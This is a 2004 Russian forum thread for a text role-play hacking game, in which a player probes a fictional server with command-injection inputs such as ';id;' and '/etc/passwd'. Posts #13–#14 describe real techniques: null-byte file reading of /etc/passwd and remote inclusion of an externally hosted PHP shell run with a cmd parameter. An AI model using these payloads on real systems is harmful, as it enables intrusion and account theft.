
Дип-гейм-2: компьютер в комнате у Shellaur
#1
Отправлено 13:04:10 - 27.11.2004
ЭТО ЧАСТЬ ИГРЫ "ДИП-ГЕЙМ-2". ПРОЧИТАТЬ ПРАВИЛА И ПРИСОЕДИНИТЬСЯ К ИГРЕ ВЫ МОЖЕТЕ В ДРУГОЙ ТЕМЕ.
Прошу также всех, кто не участвует в игре, не постить в этой теме, чтобы была видна нить повествования.
#2
Отправлено 04:00:40 - 28.11.2004
Так, так, jaros, сожно поподробнее - я дожен стырить *sql базу данных под названием Users, или фойл /etc/passwd с аккунтами пользователей сервера
#3
Отправлено 21:35:45 - 28.11.2004
ПС. Ту информацию, которую ты хочешь делать секретной, надо посылать PM-ом мне, а не класть в общем доступе. Можно считать теперь, что твоё задание теперь не секретное.
#4
Отправлено 17:46:10 - 30.11.2004
Скажи еще, какова будет система взлома.
Типа - я говорю, куда захожу, ты говоришь, что я вижу?
#5
Отправлено 21:30:04 - 30.11.2004
Так что насчёт "куда захожу" — я бы скорее сказал "что набираю на клавиатуре".
#6
Отправлено 15:06:16 - 04.12.2004
Shellaur: Продолжим?
#7
Отправлено 05:22:19 - 05.12.2004
Ты так и не ответил, запросы типа "поставляю в Query_String значение ;id;"
сендить тебе ПМом, или постить прямо тут?
#8
Отправлено 16:40:46 - 05.12.2004
#9
Отправлено 14:53:51 - 08.12.2004
#10
Отправлено 18:16:14 - 08.12.2004
Нет, у index.php появляются параметры типа "action=Admin" и "action=Downloads". Параметры всё время начинаются с "action=...", других параметров ты не видел.index.php так и остается без параметров при брожении по сайту?
Перловый форум висит на этом не серваке?
Форум работает на том же сервере.
#11
Отправлено 08:09:57 - 09.12.2004
|id
id|
|id|
;id;
/etc/passwd
Изучаю результат каждого запроса
#12
Отправлено 20:02:21 - 09.12.2004
Хм, может я чего не понял, но это что, должно было сработать?Страница не может быть отображена
К ошибке прилагаются комментарии: Извините, такой страницы (/etc/passwd) не существует.

#13
Отправлено 12:46:49 - 10.12.2004
Где результат каждого из этих запросов?
зы. Знаешь иногда работает.
Один раз было вижу www.xxxxxxx.com/cgi-bin/mag.cgi?artid=fresh
Набираю: вижу www.xxxxxxx.com/cgi-bin/mag.cgi?artid=hana
ответ: hana.html не найден
набираю вижу www.xxxxxxx.com/cgi-bin/mag.cgi?artid=/etc/passwd
ответ: /etc/passwd/html не найден
набираю вижу www.xxxxxxx.com/cgi-bin/mag.cgi?artid=/etc/passwd%00
Опаньки. Файл усеров как на ладони. Притом с абсолютным путем,
без извращений типа ../../../../../../etc/passwd%00 .
Если инетресно, могу даже урл того скрипта дать (там 4 или 5 аккаунтов с шеллом)
#14
Отправлено 12:51:14 - 10.12.2004
http://www.lohovsy_s...dyrka=file.html
ну, вместо файла добивается http://padlapass.narod.ru/buga.php , добавляется параметр cmd c никсовой командой,
и, если конфиг для php кривой то у нас есть веб-шелл
http://www.lohovsy_s.....&cmd=uname -a
#15
Отправлено 13:31:20 - 10.12.2004
Страница не может быть отображена
К ошибке прилагаются комментарии: Извините, такой страницы (id|) не существует.
Страница не может быть отображена
К ошибке прилагаются комментарии: Извините, такой страницы (|id) не существует.
Страница не может быть отображена
К ошибке прилагаются комментарии: Извините, такой страницы (|id|) не существует.
Страница не может быть отображена
К ошибке прилагаются комментарии: Извините, такой страницы (;id;) не существует.
(Дело в том, что указывается не имя внешнего файла, который надо показать, а параметр скрипта, по которому он понимает, что надо отобразить. Все данные зашиты в самом скрипте и наружу он за подсказками не лазит.)Страница не может быть отображена
К ошибке прилагаются комментарии: Извините, такой страницы (/etc/passwd) не существует.
#16
Отправлено 14:26:21 - 10.12.2004
Если отфильтровались запросы с пайпами, то это значит, что в скрипт вшит парсер, чего не может быть, судя по outputу сервера, значит форум написан на друго скриптовом языке
PS. Скрипт на php иногда даже принимая не имя файла, как аргумент, все рано успешно сожрет файл, если в конфиге явнг не запрещено указывать значение переменной метода GET файл с другого серванта
#17
Отправлено 14:45:10 - 10.12.2004

#18
Отправлено 14:54:23 - 10.12.2004
В смысле не парсер, а резалка опасных спецсимволов(/\|;, etc)
И вообще,вроде бы форум перловый, а бага с символом ; присуща обоим языкам, а вот пайпы ПХПом обрабатыватся безглючно.... эх.
доступ из скриптов, использующих метод GET, к какой-нибудь sql-базе есть?
#19
Отправлено 15:05:41 - 10.12.2004
Было бы странно, если бы таблица users совсем нигде не использовалась. Немного побродив по сайту, ты наткнулся на процедуру создания нового аккаунта в Лабиринте Смерти. Можешь заполнить анкету и стать полноценным пользователем игры. Только похоже, что форма работает по POSTу, а не по GETу.
#20
Отправлено 09:15:10 - 11.12.2004
ЗЫ. Ты уже продумал, в каком месте будет дырка в сервере, или же просто импровизируешь?
Количество пользователей, читающих эту тему: 0
0 пользователей, 0 гостей, 0 скрытых пользователей